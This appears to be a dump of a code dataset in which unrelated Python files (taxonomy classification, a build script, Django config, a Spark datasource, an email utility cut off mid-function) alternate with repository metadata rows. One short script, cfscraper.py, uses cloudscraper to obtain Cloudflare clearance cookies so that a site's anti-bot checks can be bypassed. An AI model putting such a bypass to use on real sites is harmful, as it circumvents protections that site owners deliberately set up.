            if fields[0] in all_hits:
                mapping[fields[0]] = fields[1]
    return mapping
def import_taxids_with_multiple_offspring(
        taxids_with_multiple_offspring_file, log_file, quiet):
    """Load the set of taxids listed as having more than one offspring."""
    message = 'Loading file {0}.'.format(taxids_with_multiple_offspring_file)
    shared.give_user_feedback(message, log_file, quiet)
    with open(taxids_with_multiple_offspring_file, 'r') as handle:
        return {row.rstrip() for row in handle}
def find_lineage(taxid, taxid2parent, lineage=None):
    """Return the lineage of `taxid` as a list ordered leaf -> root.

    The root is detected as a taxid that is its own parent.  When a
    `lineage` list is supplied, taxids are appended to it and the same
    list is returned.
    """
    chain = [] if lineage is None else lineage
    current = taxid
    while True:
        chain.append(current)
        parent = taxid2parent[current]
        if parent == current:
            return chain
        current = parent
def find_LCA(list_of_lineages):
    """Return the lowest taxid shared by every lineage.

    Lineages run leaf -> root, so the first shared taxid encountered in the
    first lineage is the lowest common ancestor.  Returns None (implicit
    fall-through) when the lineages share nothing.
    """
    shared_taxids = set(list_of_lineages[0]).intersection(*list_of_lineages[1:])
    for candidate in list_of_lineages[0]:
        if candidate in shared_taxids:
            return candidate
def find_LCA_for_ORF(hits, fastaid2LCAtaxid, taxid2parent):
    """Find the LCA taxid for one ORF from its (fasta id, bitscore) hits.

    Returns (taxid, top_bitscore).  When none of the hits has a known
    taxid, the first element is a 'no taxid found (...)' message instead.

    Fix: the bare `except:` is narrowed to KeyError -- it previously also
    swallowed KeyboardInterrupt/SystemExit and any programming error.
    """
    list_of_lineages = []
    top_bitscore = 0
    for (hit, bitscore) in hits:
        if bitscore > top_bitscore:
            top_bitscore = bitscore
        try:
            taxid = fastaid2LCAtaxid[hit]
            lineage = find_lineage(taxid, taxid2parent)
        except KeyError:
            # The fastaid does not have an associated taxid for some reason.
            continue
        list_of_lineages.append(lineage)
    if len(list_of_lineages) == 0:
        return ('no taxid found ({0})'.format(';'.join([i[0] for i in hits])),
                top_bitscore)
    # Lowest common ancestor: the first taxid of the first lineage that
    # occurs in every lineage (lineages run leaf -> root).
    overlap = set.intersection(*map(set, list_of_lineages))
    for taxid in list_of_lineages[0]:
        if taxid in overlap:
            return (taxid, top_bitscore)
def find_questionable_taxids(lineage, taxids_with_multiple_offspring):
    """Return the leading taxids of `lineage` (ordered leaf -> root) that sit
    below the first ancestor having multiple offspring.

    Those classifications are 'questionable' because the taxonomy offers only
    a single path through them.  A root-only lineage (or leaf + root) is
    never questionable.

    Fix: the original indexed lineage[i + 1] inside an enumerate loop and
    raised IndexError whenever no ancestor was in the set; it also fell
    through to an implicit None for an empty lineage.  Both cases now return
    the accumulated list.
    """
    questionable_taxids = []
    if lineage == ['1'] or lineage == ['root']:
        return questionable_taxids
    if len(lineage) == 2 and (lineage[1:] == ['1'] or lineage[1:] == ['root']):
        return questionable_taxids
    # Walk (child, parent) pairs; stop as soon as a parent is known to have
    # more than one offspring.
    for taxid, taxid_parent in zip(lineage, lineage[1:]):
        if taxid_parent in taxids_with_multiple_offspring:
            return questionable_taxids
        questionable_taxids.append(taxid)
    return questionable_taxids
def star_lineage(lineage, taxids_with_multiple_offspring):
    """Return `lineage` with every questionable taxid suffixed with '*'."""
    questionable = find_questionable_taxids(lineage,
                                            taxids_with_multiple_offspring)
    return ['{0}*'.format(taxid) if taxid in questionable else taxid
            for taxid in lineage]
def find_weighted_LCA(LCAs_ORFs, taxid2parent, f):
    """Classify a contig from its per-ORF LCA calls.

    Args:
        LCAs_ORFs: iterable of (taxid, top_bitscore) pairs, one per ORF.
            Taxids starting with 'no taxid found' are skipped.
        taxid2parent: taxid -> parent taxid mapping.
        f: minimum fraction of the summed bitscore a taxid must exceed to
            be whitelisted.

    Returns:
        (lineages, lineage_scores, based_on_n_ORFs), or a triple of
        identical message strings when classification is impossible.
    """
    list_of_lineages = []
    list_of_bitscores = []
    based_on_n_ORFs = 0
    for (taxid, top_bitscore) in LCAs_ORFs:
        if taxid.startswith('no taxid found'):
            # Thus the ORFs that are not classified because they don't have an
            # associated taxid are not taken into account for the
            # classification of the contig.
            continue
        lineage = find_lineage(taxid, taxid2parent)
        list_of_lineages.append(lineage)
        list_of_bitscores.append(top_bitscore)
        based_on_n_ORFs += 1
    if len(list_of_lineages) == 0:
        return (
            'no ORFs with taxids found.',
            'no ORFs with taxids found.',
            'no ORFs with taxids found.')
    # Sum, per taxid, the bitscores of every ORF whose lineage contains it.
    taxid2bitscore = {}
    for (i, lineage) in enumerate(list_of_lineages):
        for taxid in lineage:
            if taxid not in taxid2bitscore:
                taxid2bitscore[taxid] = 0
            taxid2bitscore[taxid] += list_of_bitscores[i]
    # Whitelist taxids supported by more than fraction f of the total score.
    whitelisted_lineages = []
    for taxid in taxid2bitscore:
        if taxid2bitscore[taxid] / sum(list_of_bitscores) > f:
            lineage = find_lineage(taxid, taxid2parent)
            whitelisted_lineages.append(lineage)
    if len(whitelisted_lineages) == 0:
        return (
            'no lineage whitelisted.',
            'no lineage whitelisted.',
            'no lineage whitelisted.')
    # Keep the longest (most specific) lineage per taxonomic branch: walk
    # lineages longest-first and keep each whose leaf was not already seen.
    whitelisted_lineages = sorted(whitelisted_lineages,
                                  key=lambda x: len(x), reverse=True)
    longest_lineages = []
    longest_lineages_scores = []
    taxid_trace = set()
    for whitelisted_lineage in whitelisted_lineages:
        if whitelisted_lineage[0] not in taxid_trace:
            longest_lineages.append(whitelisted_lineage)
            scores = [taxid2bitscore[taxid] / sum(list_of_bitscores) for
                      taxid in whitelisted_lineage]
            longest_lineages_scores.append(scores)
            taxid_trace |= set(whitelisted_lineage)
    return (longest_lineages, longest_lineages_scores, based_on_n_ORFs)
def convert_to_names(lineage, taxid2rank, taxid2name, scores=None):
    """Translate a lineage of taxids into 'name (rank)' strings.

    A trailing '*' on a taxid marks it questionable and is carried onto the
    name.  When `scores` is given, ': score' is appended per entry.
    """
    names = []
    for position, taxid in enumerate(lineage):
        starred = '*' in taxid
        if starred:
            taxid = taxid.rstrip('*')
        name = taxid2name[taxid]
        rank = taxid2rank[taxid]
        if scores is not None:
            if starred:
                entry = '{0}* ({1}): {2}'.format(name, rank, scores[position])
            else:
                entry = '{0} ({1}): {2}'.format(name, rank, scores[position])
        elif starred:
            entry = '{0}* ({1})'.format(name, rank)
        else:
            entry = '{0} ({1})'.format(name, rank)
        names.append(entry)
    return names
def convert_to_official_names(lineage, taxid2rank, taxid2name, scores=None):
    """Project a lineage onto the seven official ranks.

    Returns a 7-item list (superkingdom .. species).  Ranks absent from the
    lineage read 'no support', except that gaps *below* the lowest supported
    rank are backfilled with 'NA'.  Starred (questionable) taxids keep their
    '*'; when `scores` is given each name gets ': score' appended.
    """
    official_ranks = ['superkingdom', 'phylum', 'class', 'order', 'family',
                      'genus', 'species']
    lineage_ranks = [taxid2rank[taxid.rstrip('*')] for taxid in lineage]
    official_names = ['no support'] * 7
    for (i, rank) in enumerate(official_ranks):
        if rank in lineage_ranks:
            index = lineage_ranks.index(rank)
            taxid = lineage[index]
            if '*' in taxid:
                taxid = taxid.rstrip('*')
                starred = True
            else:
                starred = False
            name = taxid2name[taxid]
            if scores is not None:
                if starred:
                    official_names[i] = '{0}*: {1}'.format(name, scores[index])
                else:
                    official_names[i] = '{0}: {1}'.format(name, scores[index])
            else:
                if starred:
                    official_names[i] = '{0}*'.format(name)
                else:
                    official_names[i] = name
    # Fill the official lineage with NAs if a lower classification is present.
    index_lowest_classification = 0
    for (i, name) in enumerate(official_names):
        if name != 'no support':
            index_lowest_classification = i
    for i in range(index_lowest_classification):
        if official_names[i] == 'no support':
            official_names[i] = 'NA'
    return official_names
if __name__ == '__main__':
    # This module is a library; direct invocation just points the user at CAT.
    sys.exit('Run \'CAT\' to run CAT or BAT.')
| 29.377104 | 82 | 0.594155 |
ace8df01dc96fae187634aad51209a07002c0ec1 | 3,757 | py | Python | speedy/setup.py | ashrafizahra81/CodART | 693e59d568b548edb2539d04cff1fd991de43124 | [
"MIT"
] | 1 | 2022-02-04T11:09:08.000Z | 2022-02-04T11:09:08.000Z | speedy/setup.py | ashrafizahra81/CodART | 693e59d568b548edb2539d04cff1fd991de43124 | [
"MIT"
] | null | null | null | speedy/setup.py | ashrafizahra81/CodART | 693e59d568b548edb2539d04cff1fd991de43124 | [
"MIT"
] | null | null | null | """
`java8speedy` module setup
Adding support for Java 8 labeled grammar
"""
__version__ = '0.5.0'
__author__ = 'Morteza'
import sys
import os
import platform
import fnmatch
import setuptools
# Canonical platform key for choosing compiler flags.  platform.system()
# returns values like 'Windows', 'Darwin' or 'CYGWIN_NT-10.0'; collapse any
# recognized prefix onto its canonical lowercase name, otherwise keep the
# raw lowercase value.
target = platform.system().lower()
PLATFORMS = {'windows', 'linux', 'darwin', 'cygwin'}
target = next((known for known in PLATFORMS if target.startswith(known)), target)
def run_setup(with_binary):
    """Run setuptools.setup for java8speedy.

    When `with_binary` is true, build the C++ Antlr-accelerator extension
    (sources discovered under cpp_src); otherwise build a pure-Python
    package so installation still succeeds on hosts without a compiler.
    """
    if with_binary:
        # Per-platform compiler flags, keyed by the module-level `target`.
        extra_compile_args = {
            'windows': ['/DANTLR4CPP_STATIC', '/Zc:__cplusplus'],
            'linux': ['-std=c++11'],
            'darwin': ['-std=c++11'],
            'cygwin': ['-std=c++11'],
        }
        # Define an Extension object that describes the Antlr accelerator
        parser_ext = setuptools.Extension(
            # Extension name shall be at the same level as the sa_java8_parser.py module
            name='java8speedy.parser.sa_javalabeled_cpp_parser',
            # Add the Antlr runtime source directory to the include search path
            include_dirs=["src/java8speedy/parser/cpp_src/antlr4_cpp_runtime"],
            # Rather than listing each C++ file (Antlr has a lot!), discover them automatically
            sources=get_files("src/java8speedy/parser/cpp_src", "*.cpp"),
            depends=get_files("src/java8speedy/parser/cpp_src", "*.h"),
            extra_compile_args=extra_compile_args.get(target, [])
        )
        ext_modules = [parser_ext]
    else:
        ext_modules = []
    # Define a package
    setuptools.setup(
        name='java8speedy',
        version='1.2.0',
        description='Java Speedup Parser',
        packages=setuptools.find_packages("src"),
        package_dir={"": "src"},
        include_package_data=True,
        install_requires=[
            "antlr4-python3-runtime >= 4.9.2",
        ],
        ext_modules=ext_modules,
        # ve_build_ext converts compiler failures into BuildFailed so the
        # caller can retry without the binary extension.
        cmdclass={"build_ext": ve_build_ext},
    )
# ===============================================================================
from setuptools.command.build_ext import build_ext
from distutils.errors import CCompilerError, DistutilsExecError, DistutilsPlatformError
def get_files(path, pattern):
    """
    Recursive file search that is compatible with python3.4 and older:
    return the paths under `path` whose basename matches the fnmatch
    `pattern`.
    """
    found = []
    for dirpath, _, filenames in os.walk(path):
        found.extend(os.path.join(dirpath, name)
                     for name in fnmatch.filter(filenames, pattern))
    return found
class BuildFailed(Exception):
    # Raised (via ve_build_ext) when compiling the C++ accelerator fails,
    # so the caller can fall back to a pure-Python build.
    pass
class ve_build_ext(build_ext):
    """
    This class extends setuptools to fail with a common BuildFailed exception
    if a build fails
    """
    def run(self):
        # A missing compiler surfaces as DistutilsPlatformError at this stage.
        try:
            build_ext.run(self)
        except DistutilsPlatformError:
            raise BuildFailed()
    def build_extension(self, ext):
        try:
            build_ext.build_extension(self, ext)
        except (CCompilerError, DistutilsExecError, DistutilsPlatformError):
            raise BuildFailed()
        except ValueError:
            # this can happen on Windows 64 bit, see Python issue 7511
            if "'path'" in str(sys.exc_info()[1]): # works with Python 2 and 3
                raise BuildFailed()
            # Any other ValueError is a real bug: re-raise unchanged.
            raise
# Detect if an alternate interpreter is being used
is_jython = "java" in sys.platform
is_pypy = hasattr(sys, "pypy_version_info")
# Force using fallback if using an alternate interpreter
using_fallback = is_jython or is_pypy
# First try the binary build; on BuildFailed retry as pure Python, unless CI
# explicitly requires the binary to succeed.
if not using_fallback:
    try:
        run_setup(with_binary=True)
    except BuildFailed:
        if 'SPAM_EXAMPLE_REQUIRE_CI_BINARY_BUILD' in os.environ:
            # Require build to pass if running in travis-ci
            raise
        else:
            using_fallback = True
if using_fallback:
    run_setup(with_binary=False)
| 28.9 | 95 | 0.627096 |
ace8df29b93364ee4ac1b404be6a9188d5a201f3 | 966 | py | Python | rkpylib/backups/rkhttp_globals.py | rafaank/rkpylib | 9081044fd535bc8792df54a16611c835592a4343 | [
"Apache-2.0"
] | null | null | null | rkpylib/backups/rkhttp_globals.py | rafaank/rkpylib | 9081044fd535bc8792df54a16611c835592a4343 | [
"Apache-2.0"
] | null | null | null | rkpylib/backups/rkhttp_globals.py | rafaank/rkpylib | 9081044fd535bc8792df54a16611c835592a4343 | [
"Apache-2.0"
] | 1 | 2019-04-29T10:29:51.000Z | 2019-04-29T10:29:51.000Z | from .rkdatasource import RKDataSource
from .rkutils import RKDict
from threading import Lock
def __init_globals__(globals):
    """Populate the shared registry used by request handlers.

    Registers a counter, a pool of 5 RKDataSource connections with one Lock
    each (indices of `dspool` and `dspool_lock` correspond), the pool
    accessor `dspool_func`, and a request counter.  Note the parameter
    shadows the builtin `globals` (kept for interface compatibility).
    """
    globals.register('counter', 0)
    dspool = list()
    dspool_lock = list()
    for i in range(5):
        # NOTE(review): connection parameters are hard-coded; presumably
        # these should come from configuration -- confirm.
        ds = RKDataSource(server='127.0.0.1', port=27017, database='test')
        lck = Lock()
        dspool.append(ds)
        dspool_lock.append(lck)
    globals.register('dspool', dspool)
    globals.register('dspool_lock', dspool_lock)
    globals.register('dspool_func', dspool_func)
    globals.register('total_requests', 0)
def dspool_func(pool, pool_lock):
    """Return the first datasource in `pool` whose paired lock in
    `pool_lock` can be acquired without blocking, as a
    {'lock': Lock, 'ds': datasource} dict; None when all are busy.

    The caller owns the acquired lock and must release it when done.
    """
    for idx, candidate in enumerate(pool):
        lock = pool_lock[idx]
        if not lock.acquire(False):
            continue
        print(f"Found dspool_item at index {idx}")
        return {'lock': lock, 'ds': candidate}
    return None
| 26.833333 | 75 | 0.589027 |
ace8df2ea42d82eb80755688a3c2f0e138661e1e | 1,685 | py | Python | config/wsgi.py | Tlazypanda/outpass | bd52b8b91880471965b997fb4f494c0ad1aa2f20 | [
"MIT"
] | null | null | null | config/wsgi.py | Tlazypanda/outpass | bd52b8b91880471965b997fb4f494c0ad1aa2f20 | [
"MIT"
] | null | null | null | config/wsgi.py | Tlazypanda/outpass | bd52b8b91880471965b997fb4f494c0ad1aa2f20 | [
"MIT"
] | null | null | null | """
WSGI config for outpass project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
# This allows easy placement of apps within the interior
# outpass directory.
app_path = os.path.abspath(os.path.join(
os.path.dirname(os.path.abspath(__file__)), os.pardir))
sys.path.append(os.path.join(app_path, 'outpass'))
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "config.settings.production"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| 41.097561 | 79 | 0.796439 |
ace8df5b2e10fc1964ba39af2e08e48c532e237a | 286 | py | Python | src/Javinizer/cfscraper.py | Anytinz/Javinizer | 64420c6ca0ca35faa62ccc5df8b647506dbca1b7 | [
"MIT"
] | null | null | null | src/Javinizer/cfscraper.py | Anytinz/Javinizer | 64420c6ca0ca35faa62ccc5df8b647506dbca1b7 | [
"MIT"
] | null | null | null | src/Javinizer/cfscraper.py | Anytinz/Javinizer | 64420c6ca0ca35faa62ccc5df8b647506dbca1b7 | [
"MIT"
] | null | null | null | import cloudscraper
import sys
cookie_value, user_agent = cloudscraper.get_cookie_string(
sys.argv[1], browser={'browser': 'chrome', 'mobile': False})
#cookie_value, user_agent = cloudscraper.get_cookie_string(sys.argv[1])
print('{}\n{}'.format(cookie_value, user_agent))
| 31.777778 | 72 | 0.734266 |
ace8e07bb71aa8492ac0d369acebc5aa1c2a8aca | 7,690 | py | Python | great_expectations/datasource/sparkdf_datasource.py | louispotok/great_expectations | b91a3ce10f771742f49ccad9c403bda03f318515 | [
"Apache-2.0"
] | null | null | null | great_expectations/datasource/sparkdf_datasource.py | louispotok/great_expectations | b91a3ce10f771742f49ccad9c403bda03f318515 | [
"Apache-2.0"
] | null | null | null | great_expectations/datasource/sparkdf_datasource.py | louispotok/great_expectations | b91a3ce10f771742f49ccad9c403bda03f318515 | [
"Apache-2.0"
] | null | null | null | import logging
import time
from six import string_types
from ..exceptions import BatchKwargsError
from .datasource import Datasource, ReaderMethods
from great_expectations.datasource.generator.subdir_reader_generator import SubdirReaderGenerator
from great_expectations.datasource.generator.databricks_generator import DatabricksTableGenerator
from great_expectations.datasource.generator.in_memory_generator import InMemoryGenerator
from great_expectations.datasource.generator.s3_generator import S3Generator
from great_expectations.types import ClassConfig
logger = logging.getLogger(__name__)
try:
    from great_expectations.dataset.sparkdf_dataset import SparkDFDataset
    from pyspark.sql import SparkSession, DataFrame
except ImportError:
    # Only SparkSession is nulled out here; SparkDFDataset and DataFrame
    # remain undefined when pyspark is missing, so code paths referencing
    # them would raise NameError.
    SparkSession = None
    # TODO: review logging more detail here
    logger.debug("Unable to load pyspark; install optional spark dependency for support.")
class SparkDFDatasource(Datasource):
    """The SparkDFDatasource produces SparkDFDatasets and supports generators capable of interacting with the local
    filesystem (the default subdir_reader generator) and databricks notebooks.

    Batches can be built from files on a path or s3 location, from a Spark
    SQL query, or from an in-memory DataFrame (see _get_data_asset).
    """
    @classmethod
    def build_configuration(cls, data_asset_type=None, generators=None, **kwargs):
        """
        Build a full configuration object for a datasource, potentially including generators with defaults.

        Args:
            data_asset_type: A ClassConfig dictionary
            generators: Generator configuration dictionary
            **kwargs: Additional kwargs to be part of the datasource constructor's initialization

        Returns:
            A complete datasource configuration.
        """
        if generators is None:
            # Provide a gentle way to build a datasource with a sane default,
            # including ability to specify the base_directory
            # (base_directory/reader_options are consumed here so they do not
            # leak into the datasource-level kwargs).
            base_directory = kwargs.pop("base_directory", "/data")
            reader_options = kwargs.pop("reader_options", {})
            generators = {
                "default": {
                    "class_name": "SubdirReaderGenerator",
                    "base_directory": base_directory,
                    "reader_options": reader_options
                }
            }
        if data_asset_type is None:
            data_asset_type = ClassConfig(
                class_name="SparkDFDataset"
            )
        else:
            try:
                data_asset_type = ClassConfig(**data_asset_type)
            except TypeError:
                # In this case, we allow the passed config, for now, in case they're using a legacy string-only config
                pass
        # Remaining kwargs become top-level datasource configuration keys.
        configuration = kwargs
        configuration.update({
            "data_asset_type": data_asset_type,
            "generators": generators,
        })
        return configuration
    def __init__(self, name="default", data_context=None, data_asset_type=None, generators=None, **kwargs):
        """Initialize the datasource and eagerly create its generators.

        Extra **kwargs are folded into the configuration by
        build_configuration (e.g. base_directory, reader_options).
        """
        configuration_with_defaults = SparkDFDatasource.build_configuration(data_asset_type, generators, **kwargs)
        data_asset_type = configuration_with_defaults.pop("data_asset_type")
        generators = configuration_with_defaults.pop("generators")
        super(SparkDFDatasource, self).__init__(
            name,
            data_context=data_context,
            data_asset_type=data_asset_type,
            generators=generators,
            **configuration_with_defaults)
        try:
            self.spark = SparkSession.builder.getOrCreate()
        except AttributeError:
            # SparkSession is None when pyspark failed to import at module
            # load time; .builder then raises AttributeError.
            logger.error("Unable to load spark context; install optional spark dependency for support.")
            self.spark = None
        self._build_generators()
def _get_generator_class_from_type(self, type_):
if type_ == "subdir_reader":
return SubdirReaderGenerator
elif type_ == "databricks":
return DatabricksTableGenerator
elif type_ == "memory":
return InMemoryGenerator
elif type_ == "s3":
return S3Generator
else:
raise ValueError("Unrecognized BatchGenerator type %s" % type_)
    def _get_data_asset(self, batch_kwargs, expectation_suite, caching=True, **kwargs):
        """class-private implementation of get_data_asset

        Builds a Spark DataFrame from one of three batch_kwargs shapes --
        a file/s3 path (read via csv/parquet/delta), a Spark SQL "query",
        or an in-memory "dataset" -- and wraps it in the configured
        SparkDFDataset subclass.  Note: mutates `batch_kwargs` in place
        (merges **kwargs, may pop "dataset" and add "SparkDFRef").
        """
        if self.spark is None:
            logger.error("No spark session available")
            return None
        batch_kwargs.update(kwargs)
        # Everything left in reader_options after the pops below is passed
        # through to the Spark reader as option(key, value).
        reader_options = batch_kwargs.copy()
        if "data_asset_type" in reader_options:
            data_asset_type_config = reader_options.pop("data_asset_type") # Get and remove the config
            try:
                data_asset_type_config = ClassConfig(**data_asset_type_config)
            except TypeError:
                # We tried; we'll pass the config downstream, probably as a string, and handle an error later
                pass
        else:
            data_asset_type_config = self._data_asset_type
        data_asset_type = self._get_data_asset_class(data_asset_type_config)
        if not issubclass(data_asset_type, SparkDFDataset):
            raise ValueError("SparkDFDatasource cannot instantiate batch with data_asset_type: '%s'. It "
                             "must be a subclass of SparkDFDataset." % data_asset_type.__name__)
        if "path" in batch_kwargs or "s3" in batch_kwargs:
            if "path" in batch_kwargs:
                path = reader_options.pop("path") # We remove this so it is not used as a reader option
            else:
                path = reader_options.pop("s3")
            reader_options.pop("timestamp", "") # ditto timestamp (but missing ok)
            reader_method = reader_options.pop("reader_method", None)
            if reader_method is None:
                # Fall back to guessing the format from the file extension.
                reader_method = self._guess_reader_method_from_path(path)
                if reader_method is None:
                    raise BatchKwargsError("Unable to determine reader for path: %s" % path, batch_kwargs)
            else:
                try:
                    reader_method = ReaderMethods[reader_method]
                except KeyError:
                    raise BatchKwargsError("Unknown reader method: %s" % reader_method, batch_kwargs)
            reader = self.spark.read
            for option in reader_options.items():
                reader = reader.option(*option)
            if reader_method == ReaderMethods.CSV:
                df = reader.csv(path)
            elif reader_method == ReaderMethods.parquet:
                df = reader.parquet(path)
            elif reader_method == ReaderMethods.delta:
                df = reader.format("delta").load(path)
            else:
                raise BatchKwargsError("Unsupported reader: %s" % reader_method.name, batch_kwargs)
        elif "query" in batch_kwargs:
            df = self.spark.sql(batch_kwargs["query"])
        elif "dataset" in batch_kwargs and isinstance(batch_kwargs["dataset"], (DataFrame, SparkDFDataset)):
            df = batch_kwargs.pop("dataset") # We don't want to store the actual DataFrame in kwargs
            if isinstance(df, SparkDFDataset):
                # Grab just the spark_df reference, since we want to override everything else
                df = df.spark_df
            batch_kwargs["SparkDFRef"] = True
        else:
            raise BatchKwargsError("Unrecognized batch_kwargs for spark_source", batch_kwargs)
        return data_asset_type(df,
                               expectation_suite=expectation_suite,
                               data_context=self._data_context,
                               batch_kwargs=batch_kwargs,
                               caching=caching)
| 42.960894 | 118 | 0.641222 |
ace8e0a9cf61d866682b5a15c09cdce97c87cb8e | 475 | py | Python | Python/21 - 104 - validando entrada de dados em python.py | matheusguerreiro/python | f39a1b92409f11cbe7fef5d9261f863f9e0fac0d | [
"MIT"
] | null | null | null | Python/21 - 104 - validando entrada de dados em python.py | matheusguerreiro/python | f39a1b92409f11cbe7fef5d9261f863f9e0fac0d | [
"MIT"
] | null | null | null | Python/21 - 104 - validando entrada de dados em python.py | matheusguerreiro/python | f39a1b92409f11cbe7fef5d9261f863f9e0fac0d | [
"MIT"
] | null | null | null | # Aula 21 (Funรงรตes (Parte 2))
def leiaInt(msg):
ok = False
valor = 0
while True:
n = str(input(msg))
if n.isnumeric():
valor = int(n)
ok = True
else:
print(f'\033[1;31mErro! Digite um nรบmero inteiro.\033[m')
if ok == True:
break
return valor
print('Validaรงรฃo de Dados')
numero = leiaInt('Digite um Nรบmero: ')
print(f'\033[1;32mVocรช acabou de digitar o nรบmero {numero}.\033[m') | 23.75 | 69 | 0.547368 |
ace8e12ff8bf60b4eff34031261469d302a0cd09 | 326 | py | Python | users/views.py | Shubarin/api_booking | 2340a022843410a882ff1e9434d5a21601be42a2 | [
"BSD-3-Clause"
] | null | null | null | users/views.py | Shubarin/api_booking | 2340a022843410a882ff1e9434d5a21601be42a2 | [
"BSD-3-Clause"
] | null | null | null | users/views.py | Shubarin/api_booking | 2340a022843410a882ff1e9434d5a21601be42a2 | [
"BSD-3-Clause"
] | null | null | null | from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import CreateView
from .forms import CreationForm
class SignUp(CreateView):
    # Registration view: renders CreationForm and, on success, redirects to
    # the URL named "login" ("login" is the `name` argument given to path()
    # in the URL conf).
    form_class = CreationForm
    success_url = reverse_lazy("login")
    template_name = "signup.html"
| 27.166667 | 83 | 0.766871 |
ace8e298717059a1cc2600ae30b349d57e78fb72 | 60 | py | Python | selectable_select2/base.py | pablochud/django-selectable-select2 | 5561d9eaf48a56e3f1b74466cc6c4fe82ced07d1 | [
"BSD-3-Clause"
] | null | null | null | selectable_select2/base.py | pablochud/django-selectable-select2 | 5561d9eaf48a56e3f1b74466cc6c4fe82ced07d1 | [
"BSD-3-Clause"
] | null | null | null | selectable_select2/base.py | pablochud/django-selectable-select2 | 5561d9eaf48a56e3f1b74466cc6c4fe82ced07d1 | [
"BSD-3-Clause"
] | null | null | null | from selectable.base import LookupBase, ModelLookup # noqa
| 30 | 59 | 0.816667 |
ace8e4bd05c05282d660096396f00952214f29be | 678 | py | Python | tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial3_Solution_1d165229.py | liuxiaomiao123/NeuroMathAcademy | 16a7969604a300bf9fbb86f8a5b26050ebd14c65 | [
"CC-BY-4.0"
] | 2 | 2020-07-03T04:39:09.000Z | 2020-07-12T02:08:31.000Z | tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial3_Solution_1d165229.py | NinaHKivanani/course-content | 3c91dd1a669cebce892486ba4f8086b1ef2e1e49 | [
"CC-BY-4.0"
] | 1 | 2020-06-22T22:57:03.000Z | 2020-06-22T22:57:03.000Z | tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial3_Solution_1d165229.py | NinaHKivanani/course-content | 3c91dd1a669cebce892486ba4f8086b1ef2e1e49 | [
"CC-BY-4.0"
] | 1 | 2022-01-23T20:16:15.000Z | 2022-01-23T20:16:15.000Z | def correlate_rdms(rdm1, rdm2):
"""Correlate off-diagonal elements of two RDM's
Args:
rdm1 (np.ndarray): S x S representational dissimilarity matrix
rdm2 (np.ndarray): S x S representational dissimilarity matrix to
correlate with rdm1
Returns:
float: correlation coefficient between the off-diagonal elements
of rdm1 and rdm2
"""
# Extract off-diagonal elements of each RDM
ioffdiag = np.triu_indices(rdm1.shape[0], k=1) # indices of off-diagonal elements
rdm1_offdiag = rdm1[ioffdiag]
rdm2_offdiag = rdm2[ioffdiag]
# Compute correlation coefficient
return zscore(rdm1_offdiag) @ zscore(rdm2_offdiag) / len(rdm2_offdiag) | 32.285714 | 84 | 0.728614 |
ace8e6837c6387950b17bcb0b39bb475481a0376 | 7,982 | py | Python | util/useremails.py | bcaton85/quay | a60d0c9248e2a8ee159bcf9c6bd6efcebf2e9d6e | [
"Apache-2.0"
] | null | null | null | util/useremails.py | bcaton85/quay | a60d0c9248e2a8ee159bcf9c6bd6efcebf2e9d6e | [
"Apache-2.0"
] | null | null | null | util/useremails.py | bcaton85/quay | a60d0c9248e2a8ee159bcf9c6bd6efcebf2e9d6e | [
"Apache-2.0"
] | null | null | null | import os
import json
import logging
import features
from unittest import mock
from flask_mail import Message
from _init import ROOT_DIR
from singletons.config import app_config, get_app_url
from singletons.mail import mail
from util.jinjautil import get_template_env
from util.html import html2text
from util.fips import login_fips_safe
logger = logging.getLogger(__name__)
template_env = get_template_env(os.path.join(ROOT_DIR, "emails"))
class CannotSendEmailException(Exception):
    # Wraps any failure raised while handing a message to the configured
    # mail backend (raised by send_email).
    pass
class GmailAction(object):
    """
    Represents an action that can be taken in Gmail in response to the email.

    `metadata` is a schema.org "EmailMessage" dict that render_email embeds
    (JSON-serialized) into the outgoing message.
    """
    def __init__(self, metadata):
        self.metadata = metadata
    @staticmethod
    def confirm(name, url, description):
        """Build a one-click ConfirmAction whose handler is the app-relative `url`."""
        return GmailAction(
            {
                "@context": "http://schema.org",
                "@type": "EmailMessage",
                "action": {
                    "@type": "ConfirmAction",
                    "name": name,
                    "handler": {"@type": "HttpActionHandler", "url": get_app_url() + "/" + url},
                },
                "description": description,
            }
        )
    @staticmethod
    def view(name, url, description):
        """Build a ViewAction link pointing at the app-relative `url`."""
        return GmailAction(
            {
                "@context": "http://schema.org",
                "@type": "EmailMessage",
                "action": {"@type": "ViewAction", "name": name, "url": get_app_url() + "/" + url},
                "description": description,
            }
        )
def send_email(recipient, subject, template_file, parameters, action=None):
    """Render `template_file` with `parameters` and e-mail it to `recipient`.

    The subject is prefixed with the registry title.  Raises
    CannotSendEmailException when handing the message to the mail backend
    fails.

    Fix: the `action` argument is now forwarded to render_email; it was
    previously hard-coded to None, silently discarding the Gmail action
    every caller built.
    """
    app_title = app_config["REGISTRY_TITLE_SHORT"]
    app_url = get_app_url()
    html, plain = render_email(
        app_title, app_url, recipient, subject, template_file, parameters, action=action
    )
    msg = Message("[%s] %s" % (app_title, subject), recipients=[recipient])
    msg.html = html
    msg.body = plain
    try:
        if features.FIPS:
            assert app_config[
                "MAIL_USE_TLS"
            ], "MAIL_USE_TLS must be enabled to use SMTP in FIPS mode."
            # Swap in a FIPS-safe SMTP login for the duration of this send.
            with mock.patch("smtplib.SMTP.login", login_fips_safe):
                mail.send(msg)
        else:
            mail.send(msg)
        if app_config["TESTING"]:
            logger.debug("Quay is configured for testing. Email not sent: '%s'", msg.subject)
        else:
